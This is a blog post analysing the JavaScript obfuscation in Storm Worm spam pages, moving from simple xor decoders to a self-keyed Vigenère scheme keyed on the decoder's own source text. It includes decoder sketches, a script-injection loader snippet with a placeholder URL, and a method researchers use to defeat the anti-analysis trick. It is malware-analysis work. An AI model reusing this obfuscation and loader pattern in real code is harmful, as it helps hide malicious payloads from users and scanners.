Storm Worm Vigenère

Note: This entry has been restored from old archives.

A small hobby of mine is picking apart JavaScript/ECMAScript obfuscation such as that used by the Zhelatin/Storm/Nuwar “worm”. My usual approach, which is certainly inefficient, is to grok the actual code by translating it to Perl. I’ve written about this before in “Someone Doesn’t Like Kaspersky”.

I don’t usually have time, after wasting so much of it in the grokking, to write about these critters, and I don’t expect that to change much! Time is so hard to come by! But after looking at some of the code from recent Storm mailings I think it’s worth noting the evolution.

The previous obfuscation I’ve written about is a simple application of “xor encryption”, and much of what I’ve seen has been a variation on this at a similar level of simplicity.

The basic xor case worked along the lines of the following pattern.

    function decode(A,B) {
        ...
        eval(C);
    }
    decode(ciphertext,key);

In this case the key (and thus the ciphertext) value was randomly generated for different visits to the page. In the decode function, B is applied byte-by-byte to A to recover the plaintext C. Usually this processing was xor (^), further complicated with a URI decode or something of that ilk.
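A minimal sketch of that pattern, with hypothetical names, skipping the URI-decode step, and returning the plaintext instead of eval-ing it:

```javascript
// Sketch of the old xor-decoder pattern; names are illustrative.
// A is the ciphertext string, B the key string, applied cyclically.
function decode(A, B) {
  var C = "";
  for (var i = 0; i < A.length; i++) {
    // xor each ciphertext char code with the corresponding key char code
    C += String.fromCharCode(A.charCodeAt(i) ^ B.charCodeAt(i % B.length));
  }
  return C; // the real code would eval(C) here
}

// xor is its own inverse, so applying decode twice round-trips:
var cipher = decode("alert(1)", "k3y");
console.log(decode(cipher, "k3y")); // "alert(1)"
```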

The sample I have looked at most recently has the following form.

    function X(Y) {
        ...
        eval(Z);
    }
    X(payload);

The key differences are that the function name (X) is now a variable and the obvious key input is gone, which hints at something. What’s changed inside the code? Well, working from the final decrypt up to the start of the function, this is what happens (somewhat simplified, but this is the core pattern):

  1. An array of 8 bytes is used as a key to shift the values in the input array in the manner of a classic Vigenère cipher (applied mod-256).
  2. The key array is obtained by encoding a 32-bit value (e.g. 2309737967) to hex (0x89ABCDEF) and using the ASCII value of each hex digit to populate the key array ([56, 57, 65, 66, 67, 68, 69, 70]).
  3. The 32-bit value is obtained by condensing an array of 256 integers (array256) and the text of the decode function (funcText) into an integer! The method iterates over the characters of funcText, using the byte values as lookup indexes into array256. In complete detail: key=0xFFFFFFFF; then for i in 0 to length(funcText)-1 do:
    key=(array256[(key^funcText[i]) & 0xFF] ^ ((key >> 8) & 0xFFFFFF))
  4. The text of the decode function is obtained with arguments.callee.toString(), which has non-word chars stripped out and is converted to all-caps. Hence the importance of the function name X as an input parameter to the obfuscation; and it doesn’t stop there, since the text of the rest of the function body is also part of the key material and is full of randomised variable names. As you may have guessed, it is the random function and variable names that change from one download of the script to another, rather than just the xor key.
  5. The array of 256 integers is generated by a simple algorithm from a seed value; no need to detail it, I think. It’s worth observing that between the different downloads of the script I saw, the effective seed value didn’t change, so this array remained constant.
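The steps above can be sketched as follows. All names here are mine, and since I’m not reproducing the sample’s own table generator (step 5), I stand in a table built the classic CRC-32 way, which happens to match the step-3 update formula; whether the Vigenère shift in step 1 adds or subtracts is a detail I’m glossing over (subtraction shown).

```javascript
// Stand-in for step 5: a 256-entry table built CRC-32 style.
function buildTable() {
  var table = [];
  for (var n = 0; n < 256; n++) {
    var c = n;
    for (var k = 0; k < 8; k++) {
      c = (c & 1) ? (0xEDB88320 ^ (c >>> 1)) : (c >>> 1);
    }
    table[n] = c >>> 0;
  }
  return table;
}

var array256 = buildTable();

// Steps 2-3: condense the stripped, upper-cased function text into a
// 32-bit value, hex-encode it, and take the ASCII code of each hex digit.
function deriveKeyBytes(funcText) {
  var key = 0xFFFFFFFF;
  for (var i = 0; i < funcText.length; i++) {
    key = (array256[(key ^ funcText.charCodeAt(i)) & 0xFF] ^
           ((key >>> 8) & 0xFFFFFF)) >>> 0;
  }
  var hex = ("00000000" + key.toString(16).toUpperCase()).slice(-8);
  var keyBytes = [];
  for (var j = 0; j < hex.length; j++) keyBytes.push(hex.charCodeAt(j));
  return keyBytes; // e.g. 0x89ABCDEF -> [56, 57, 65, 66, 67, 68, 69, 70]
}

// Step 1: shift each input byte by the repeating 8-byte key, mod 256.
function vigenereDecode(bytes, keyBytes) {
  var out = [];
  for (var i = 0; i < bytes.length; i++) {
    out.push((bytes[i] - keyBytes[i % keyBytes.length] + 256) % 256);
  }
  return out;
}

// Step 4 input: the decoder's own source, non-word chars stripped.
var funcText = "function X(Y) { /* ... */ }".replace(/\W/g, "").toUpperCase();
var keyBytes = deriveKeyBytes(funcText);
```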

Certainly much more complicated than the old xor code! But, I’d hope, a waste of time, since AV suspicious-script detection should work off generic patterns visible in the script on inspection rather than relying on the variable details. Still, only 3 AV engines on virustotal.com thought this script was worth noting as “generic obfuscated HTML”, but I don’t know what script/browser components they have enabled so I wouldn’t trust these out-of-context results. Many AV products exhibit different, usually more paranoid, behaviour when scanning in-browser data and HTTP at the gateway. And, looking at the whole Storm picture, this little snippet of code is just part of the delivery mechanism; it’s more important that the actual browser exploits and malware executables are caught!

Anyway, back to the script: this thing unwraps like a matryoshka doll. The plaintext is the same algorithm over again, with new randomly generated function/variable names and a new ciphertext. The new ciphertext is much shorter though, and after decoding we’re finished with this sample. The end result is JavaScript that generates a script DOM element and appends it to the document.

    var script = document.createElement("script");

    script.setAttribute("language", "JavaScript");
    script.setAttribute("src", "<nasty_local_url>");

    document.body.appendChild(script);

The most interesting item in the sample is this use of arguments.callee.toString() as key material. No doubt a direct defence against the usual malware-researcher practice of changing the final eval into an alert to expose the plaintext. While an admirable attempt at making life harder for researchers, it’s not difficult to circumvent: just create a new variable assigned to the text “function X(Y) { ... }”, use it in place of the arguments.callee.toString(), and good old alert should do its usual trick (then unwrap the next shell of the matryoshka). (Yes, “function” and all the rest are included, though braces/punctuation don’t matter in the samples I have since an s/\W//g is applied to the text.)

The other “new technology” here is intriguing but not remarkable; using Vigenère instead of xor seems a curiosity more than a real advance (they’re certainly not doing it to hide the tell-tale use of the xor operator in a loop, since they use xor in the key-generation loops). Honestly, it looks just like some geek having fun, like me… but in this case we have a bad geek. Tut tut.

I’ve put a de-obfuscated and commented version of the script code up as well as a page containing active JavaScript that demonstrates the code. (Don’t worry, the active page’s payload is just an “alert” call!)